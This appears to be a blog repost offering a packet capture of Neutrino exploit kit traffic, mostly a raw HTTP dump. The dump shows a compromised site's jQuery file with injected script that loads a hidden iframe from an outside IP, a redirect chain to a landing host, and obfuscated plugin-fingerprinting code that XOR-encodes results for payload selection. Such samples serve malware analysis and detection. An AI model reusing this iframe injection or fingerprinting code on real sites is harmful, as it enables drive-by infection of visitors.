Get Even More Visitors To Your Blog, Upgrade To A Business Listing >>
Idioma: En

Neutrino Web Based Exploit Kit Traffic Sample full PCAP Download

Download Neutrino Exploit Kit Traffic Sample : neutrino

 

2013-06-18 19:25:23.332815 IP 192.168.122.178.49346 > 173.247.253.210.80: Flags [P.], seq 3764310395:3764310795, ack 3551114755, win 16560, length 400: HTTP: GET /media/system/js/jquery-1.6.5.min.js HTTP/1.1
E…Vi@…….z……..P.^.{….P.@…..GET /media/system/js/jquery-1.6.5.min.js HTTP/1.1
Accept: */*
Referer: http://[redacted]
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.insightcrime.org
Connection: Keep-Alive
2013-06-18 19:25:23.414570 IP 173.247.253.210.80 > 192.168.122.178.49346: Flags [P.], seq 1:265, ack 400, win 1728, length 264: HTTP: HTTP/1.1 200 OK
E..0.y@.=.[)……z..P…….^..P…>…HTTP/1.1 200 OK
Date: Wed, 19 Jun 2013 00:25:22 GMT
Vary: Accept-Encoding,User-Agent
Server: Apache
Connection: Keep-Alive
Content-Type: application/javascript
Accept-Ranges: bytes
Last-Modified: Wed, 03 Oct 2012 20:33:03 GMT
Transfer-Encoding: chunked
2013-06-18 19:25:23.415601 IP 173.247.253.210.80 > 192.168.122.178.49346: Flags [P.], seq 3025:3441, ack 400, win 1728, length 416: HTTP
E….|@.=.Z…….z..P…….^..P…….vTag.id=’dt’;
document.body.appendChild(divTag);
var js_kod2 = document.createElement(‘iframe’);
js_kod2.src = ‘http://93.171.172.220/?1’;
js_kod2.width = ‘5px’;
js_kod2.height = ‘6px’;
js_kod2.setAttribute(‘style’,’visibility:hidden’);
document.getElementById(‘dt’).appendChild(js_kod2);
}
}
}
0
2013-06-18 19:25:23.961981 IP 192.168.122.178.49357 > 93.171.172.220.80: Flags [P.], seq 591772287:591772759, ack 321085729, win 16560, length 472: HTTP: GET /?1 HTTP/1.1
E…W.@…[…z.]……P#E…#[email protected]…GET /?1 HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Referer: http://[redacted]
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 93.171.172.220
Connection: Keep-Alive
2013-06-18 19:25:24.346136 IP 93.171.172.220.80 > 192.168.122.178.49357: Flags [P.], seq 1:595, ack 472, win 1728, length 594: HTTP: HTTP/1.1 302 Found
E..z .@.=…]…..z..P…#a!#E.WP…hK..HTTP/1.1 302 Found
Date: Wed, 19 Jun 2013 00:23:35 GMT
Pragma: no-cache
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 21 Jul 1977 07:30:00 GMT
LOCATION: http://93.171.172.220/?2
Connection: Keep-Alive
Set-Cookie: 4b94b=a%3A2%3A%7Bs%3A6%3A%22groups%22%3Ba%3A1%3A%7Bi%3A1%3Bi%3A1373401415%3B%7Ds%3A7%3A%22streams%22%3Ba%3A1%3A%7Bi%3A1%3Bi%3A1373401415%3B%7D%7D; expires=Sat, 20-Jul-2013 00:23:35 GMT; path=/; domain=.93.171.172.220
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.1.6
Cache-Control: max-age=0
Last-Modified: Wed, 19 Jun 2013 00:23:35 GMT
Content-Length: 0

Related Articles

2013-06-18 19:25:24.347331 IP 192.168.122.178.49357 > 93.171.172.220.80: Flags [P.], seq 472:944, ack 595, win 16411, length 472: HTTP: GET /?2 HTTP/1.1
E…W.@…[u..z.]……P#E.W.#[email protected]…GET /?2 HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Referer: http://[redacted]
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 93.171.172.220
Connection: Keep-Alive
2013-06-18 19:25:24.734482 IP 93.171.172.220.80 > 192.168.122.178.49357: Flags [P.], seq 595:1045, ack 944, win 1996, length 450: HTTP: HTTP/1.1 302 Found
E… .@.=..^]…..z..P…#cs#E./P…….HTTP/1.1 302 Found
Date: Wed, 19 Jun 2013 00:23:36 GMT
Pragma: no-cache
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 21 Jul 1977 07:30:00 GMT
LOCATION: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.1.6
Cache-Control: max-age=0
Last-Modified: Wed, 19 Jun 2013 00:23:36 GMT
Content-Length: 0
2013-06-18 19:25:24.891153 IP 192.168.122.178.49359 > 199.195.249.188.8000: Flags [P.], seq 4182278095:4182278653, ack 302450009, win 16560, length 558
E..VW.@….”..z……[email protected]…..YP.@…..GET /aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736 HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Referer: http://[redacted]
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
2013-06-18 19:25:24.934786 IP 93.171.172.220.80 > 192.168.122.178.49357: Flags [P.], seq 595:1045, ack 944, win 1996, length 450: HTTP: HTTP/1.1 302 Found
E… .@.=..]]…..z..P…#cs#E./P…….HTTP/1.1 302 Found
Date: Wed, 19 Jun 2013 00:23:36 GMT
Pragma: no-cache
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 21 Jul 1977 07:30:00 GMT
LOCATION: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.1.6
Cache-Control: max-age=0
Last-Modified: Wed, 19 Jun 2013 00:23:36 GMT
Content-Length: 0

2013-06-18 19:25:25.194796 IP 199.195.249.188.8000 > 192.168.122.178.49359: Flags [P.], seq 1381:2533, ack 558, win 109, length 1152
E…[email protected]………z..@….
..H..P..mrW..etect.getVersion(“Flash”),quick_time:PluginDetect.getVersion(“QuickTime”),real_player:PluginDetect.getVersion(“RealPlayer”),shockwave:PluginDetect.getVersion(“Shockwave”),silver_light:PluginDetect.getVersion(“Silverlight”),vlc:PluginDetect.getVersion(“VLC”),wmp:PluginDetect.getVersion(“WMP”)},hid:a};var f={};f[b]=c;f[e]=encodeURIComponent(xor(JSON.stringify(a),c));$.post(d,f,function(a){$(“body”).append(xor(decodeURIComponent(a),c))})}function xor(a,c){for(var d=””,b=0,e=0,b=0;b<a.length;b++)e=Math.floor(b%c.length),d+=String.fromCharCode(a.charCodeAt(b)^c.charCodeAt(e));return d}
JSON.stringify=JSON.stringify||function(a){var c=typeof a;if(“object”!=c||null===a)return”string”==c&&(a='”‘+a+'”‘),String(a);var d,b,e=[],f=a&&a.constructor==Array;for(d in a)b=a[d],c=typeof b,”string”==c?b='”‘+b+'”‘:”object”==c&&null!==b&&(b=JSON.stringify(b)),e.push((f?””:'”‘+d+'”:’)+String(b));return(f?”[“:”{“)+String(e)+(f?”]”:”}”)};
</script>
</head>
<body>
<img src=’mgylmdxkq.png’><img src=’szqbqjq.png’><img src=’txvu.jpg’><img src=’plrjx.gif’>
<img src=’obzmmphsihjjxs.gif’><img src=’tutoogrerinpmdl.gif’><img src=’koqavj.gif’>
</body>
</html>
2013-06-18 19:25:25.245284 IP 199.195.249.188.8000 > 192.168.122.178.49359: Flags [P.], seq 2533:2538, ack 558, win 109, length 5
[email protected]………z..@…..=.H..P..m….0
2013-06-18 19:25:25.245927 IP 192.168.122.178.49359 > 199.195.249.188.8000: Flags [P.], seq 558:1024, ack 2538, win 16558, length 466
E…W.@….o..z……[email protected][email protected] /zbtsnshkxph.js HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:25.249082 IP 192.168.122.178.49360 > 199.195.249.188.8000: Flags [P.], seq 2188958982:2188959443, ack 145475139, win 16560, length 461
E…W.@….r..z……[email protected]…..CP.@.*…GET /lllpy.css HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:25.251600 IP 192.168.122.178.49363 > 199.195.249.188.8000: Flags [P.], seq 2769999680:2770000146, ack 1604936086, win 16560, length 466
E…W.@….j..z……..@…@[email protected] /gzfkzixuudb.js HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:25.251932 IP 192.168.122.178.49364 > 199.195.249.188.8000: Flags [P.], seq 1718863355:1718863825, ack 702567541, win 16560, length 470
E…W.@….e..z……..@fs..)[email protected]…GET /vctvkgszlijgkz.css HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive

2013-06-18 19:25:25.254356 IP 192.168.122.178.49362 > 199.195.249.188.8000: Flags [P.], seq 930960147:930960616, ack 1881382264, win 16560, length 469
E…W.@….c..z……..@7}S.p#[email protected] /mfgvlykftmyoxe.js HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:25.254700 IP 192.168.122.178.49361 > 199.195.249.188.8000: Flags [P.], seq 4016377655:4016378127, ack 2731059312, win 16560, length 472
E…W.@…._..z……[email protected][email protected]…GET /aimwofqjubqlvuzy.css HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:25.473545 IP 199.195.249.188.8000 > 192.168.122.178.49360: Flags [P.], seq 1:301, ack 461, win 108, length 300
[email protected]……z..@…..C.x..P..li…HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:25 GMT
Content-Type: text/css
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

63
vjdtmhsoqakgbnfyfpvmjghmfquzhqjdzmwmupblplrqzxpenkqwryjxodxwtgzttwfnlgybsqsrohwbsmxjkghzjevdkvwdrcr
0
2013-06-18 19:25:25.476410 IP 192.168.122.178.49360 > 199.195.249.188.8000: Flags [P.], seq 461:926, ack 301, win 16485, length 465
E…W.@….5..z……[email protected][email protected] /gmjgrxnqdx.js HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:25.480513 IP 199.195.249.188.8000 > 192.168.122.178.49363: Flags [P.], seq 1:274, ack 466, win 108, length 273
[email protected]………z..@.._.a…..P..l….HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:25 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

3a
// egmtiykiedbbhgroyvuxqovgxmqkwkpbqbvzafhfjjgqpyfouzmlnir
0

2013-06-18 19:25:25.481853 IP 192.168.122.178.49363 > 199.195.249.188.8000: Flags [P.], seq 466:932, ack 274, win 16491, length 466
E…W.@….3..z……..@…._.b.P.@k….GET /mvkhymxmmyg.js HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:25.490766 IP 199.195.249.188.8000 > 192.168.122.178.49364: Flags [P.], seq 1:382, ack 470, win 108, length 381
E…’[email protected].$…….z..@..).Tufs..P..l.!..HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:25 GMT
Content-Type: text/css
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

b4
lvueskwfdibiatmeubklcanmoesxpfpbajgstcxxkzglttqnuayxbmjpqbmggbhglnzfqxcawjlpccdwccteocteeglkisrtgrywobxlljbnlejogdtvgmzkskvadnukethtvffgogtaldpsginnunxnytobgimlctexyjdnqwobzduglhtg
0
2013-06-18 19:25:25.491944 IP 192.168.122.178.49364 > 199.195.249.188.8000: Flags [P.], seq 470:939, ack 382, win 16464, length 469
E…W.@…./..z……..@fs..).U.P.@P….GET /scripts/js/plg.js HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:25.495471 IP 199.195.249.188.8000 > 192.168.122.178.49362: Flags [P.], seq 1:376, ack 469, win 108, length 375
E…[email protected]………[email protected]#.x7}T.P..l#…HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:25 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

a0
// uazzadbvmxwjhnzobjmwnkbctgoohkebleblhdgtaddiqcxsmjpzuqbnxqceahgmlhyskemliptysqreageuxgiuwkyxsejdmhvwmiiuybtqslvssanpgvjcgiaynjbzrxwdgeyegsuzdqsvqfkwauzhdzfqj
0
2013-06-18 19:25:25.496747 IP 192.168.122.178.49362 > 199.195.249.188.8000: Flags [P.], seq 469:934, ack 376, win 16466, length 465
E…W.@….2..z……..@7}T.p#..P.@R….GET /ynxvcejiqt.js HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive

2013-06-18 19:25:25.514078 IP 199.195.249.188.8000 > 192.168.122.178.49359: Flags [P.], seq 2538:2770, ack 1024, win 127, length 232
E…[email protected]..(……z..@…..B.H..P….8..HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:25 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

11
// hswtojuprrajov
0
2013-06-18 19:25:25.515373 IP 192.168.122.178.49359 > 199.195.249.188.8000: Flags [P.], seq 1024:1490, ack 2770, win 16500, length 466
E…W.@….0..z……[email protected]…..*P.@tx…GET /ircyuaohvzo.js HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:25.518191 IP 199.195.249.188.8000 > 192.168.122.178.49361: Flags [P.], seq 1:327, ack 472, win 108, length 326
[email protected]………z..@…..p.e..P..l….HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:25 GMT
Content-Type: text/css
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

7d
qeimcdmsfqtstevlyucckbbqhhdmbfysjhemlreqhyjacemayocjqezxldkmjiesqjebajshibikfvlejnnarnxdrhqaqutheyjeibmqcuaiqmmaaaarnyveglfxg
0
2013-06-18 19:25:25.519401 IP 192.168.122.178.49361 > 199.195.249.188.8000: Flags [P.], seq 472:936, ack 327, win 16478, length 464
E…W.@….1..z……[email protected]……P.@^….GET /pznggodm.css HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:25.720536 IP 199.195.249.188.8000 > 192.168.122.178.49363: Flags [P.], seq 274:559, ack 932, win 125, length 285
[email protected]………z..@.._.b…..P..}….HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:25 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

46
// rmiesawjieqnuoaadlymbdgwcqnpopwfbektfhcnltbgibhmngyokelmvycjoyppdzj
0

2013-06-18 19:25:25.722152 IP 192.168.122.178.49363 > 199.195.249.188.8000: Flags [P.], seq 932:1393, ack 559, win 16420, length 461
E…W.@….3..z……..@…._.c.P.@$.^..GET /urdacn.js HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:25.725599 IP 199.195.249.188.8000 > 192.168.122.178.49362: Flags [P.], seq 376:759, ack 934, win 125, length 383
E…[email protected]………[email protected]#..7}V.P..}….HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:25 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

a8
// hudybzyxeletroertdbqfbhfuvxelcutxxrzwpwbabvsqzkjclzimhnhdklonghlezkbohdpjyizxsiadiipqvxtgiiuppfupqveyyuiwchuuquxzdnpzkjftrajhgdwxzavxuduwlprbjoancqmnzshqsrxzutwuusro
0
2013-06-18 19:25:25.726879 IP 192.168.122.178.49362 > 199.195.249.188.8000: Flags [P.], seq 934:1396, ack 759, win 16370, length 462
E…W.@….1..z……..@7}V.p#.nP.?.p…GET /wqqfwaf.js HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:25.738628 IP 199.195.249.188.8000 > 192.168.122.178.49360: Flags [P.], seq 301:566, ack 926, win 125, length 265
[email protected]………z..@…..o.x..P..}….HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:25 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

32
// tcrikyvgjfczifzirpdpkocfscsdktidvamgzhminpivvhd
0
2013-06-18 19:25:25.740091 IP 192.168.122.178.49360 > 199.195.249.188.8000: Flags [P.], seq 926:1391, ack 566, win 16418, length 465
E…W.@….-..z……[email protected]…..xP.@”;}..GET /jvjskjfrp.css HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:25.760202 IP 199.195.249.188.8000 > 192.168.122.178.49359: Flags [P.], seq 2770:3080, ack 1490, win 144, length 310
E..^[email protected]………z..@…..*.H..P…….HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:25 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

5f
// ztyxzszfvurhbvplkmslduqnoyxbjaljujgtbgywaqecltnwgfhjaywowuqgvbppkwjldiidyngkgtgnzowzmtojoepk
0
2013-06-18 19:25:25.761739 IP 199.195.249.188.8000 > 192.168.122.178.49361: Flags [P.], seq 327:629, ack 936, win 125, length 302
[email protected]………z..@…….e..P..}K…HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:25 GMT
Content-Type: text/css
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

65
ibcmpqzomkssmhtgfmogteynnvqxwjhflkraaqpnbhfnpzuumjbfnzsavjxrtfweqnfqeudfcjtrinluwnakmtkidizxowcekhuoc
0
2013-06-18 19:25:25.802432 IP 199.195.249.188.8000 > 192.168.122.178.49364: Flags [P.], seq 3142:4482, ack 939, win 125, length 1340
E..d’[email protected]. …….z..@..).`.fs..P..}.1..a=a.toLowerCase().replace(/\s/g,””);b=this.Plugins[a];
if(!b||!b.getVersion)return c;c.plugin=b;this.isDefined(b.installed)||(b.installed=null,b.version=null,b.version0=null,b.getVersionDone=null,b.pluginName=a);if(this.isIE&&!this.ActiveXEnabled&&”java”!==a)return c.status=-2,c;c.status=1;return c},getPluginFileVersion:function(a,b){var c,d,e,f,g=-1;if(2<this.OS||!a||!a.version||!(c=this.getNum(a.version)))return b;if(!b)return c;c=this.formatNum(c);b=this.formatNum(b);d=b.split(this.splitNumRegx);e=c.split(this.splitNumRegx);for(f=0;f<d.length;f++)if(-1<
g&&f>g&&”0″!=d[f]||e[f]!=d[f]&&(-1==g&&(g=f),”0″!=d[f]))return b;return c},AXO:window.ActiveXObject,getAXO:function(a){var b=null;try{b=new this.AXO(a)}catch(c){}return b},convertFuncs:function(a){var b,c,d=/^[\$][\$]/;for(b in a)if(d.test(b))try{c=b.slice(2),0<c.length&&!a[c]&&(a[c]=a[b](a),delete a[b])}catch(e){}},initObj:function(a,b,c){var d;if(a){if(1==a[b[0]]||c)for(d=0;d<b.length;d+=2)a[b[d]]=b[d+1];for(d in a)(c=a[d])&&1==c[b[0]]&&this.initObj(c,b)}},initScript:function(){var a=navigator,
b,c=document,d=a.userAgent||””,e=a.vendor||””,f=a.platform||””,a=a.product||””;this.initObj(this,[“$”,this]);for(b in this.Plugins)this.Plugins[b]&&this.initObj(this.Plugins[b],[“$”,this,”$$”,this.Plugins[b]],1);this.convertFuncs(this);this.OS=100;if(f){var g=[“Win”,1,”Mac”,
2013-06-18 19:25:25.948541 IP 199.195.249.188.8000 > 192.168.122.178.49363: Flags [P.], seq 559:811, ack 1393, win 142, length 252
[email protected]………z..@.._.c…..P…….HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:25 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

25
// buhzipybhvpjryvjmyouofvwwvowwrzxlh
0
2013-06-18 19:25:25.957569 IP 199.195.249.188.8000 > 192.168.122.178.49364: Flags [P.], seq 14142:15522, ack 939, win 125, length 1380
E…’[email protected]. …….z..@..)…fs..P..}….ll,winLoaded:e.winLoaded,tagName:a,outerHTML:g,DOM:this,width:this.width,obj:this.obj};if(this.div&&this.div.parentNode){this.setStyle(h,k.concat([“fontSize”,this.pluginSize+3+”px”,”lineHeight”,this.pluginSize+3+”px”,”verticalAlign”,”baseline”,”display”,”inline”]));this.div.appendChild(h);try{h.innerHTML=g}catch(l){}a.span=h;a.winLoaded=e.winLoaded}return a}},
file:{$:1,any:”fileStorageAny999″,valid:”fileStorageValid999″,save:function(a,b,c){var d=this.$;a&&d.isDefined(c)&&(a[this.any]||(a[this.any]=[]),a[this.valid]||(a[this.valid]=[]),a[this.any].push(c),(b=this.split(b,c))&&a[this.valid].push(b))},getValidLength:function(a){return a&&a[this.valid]?a[this.valid].length:0},getAnyLength:function(a){return a&&a[this.any]?a[this.any].length:0},getValid:function(a,b){return a&&a[this.valid]?this.get(a[this.valid],b):null},getAny:function(a,b){return a&&a[this.any]?
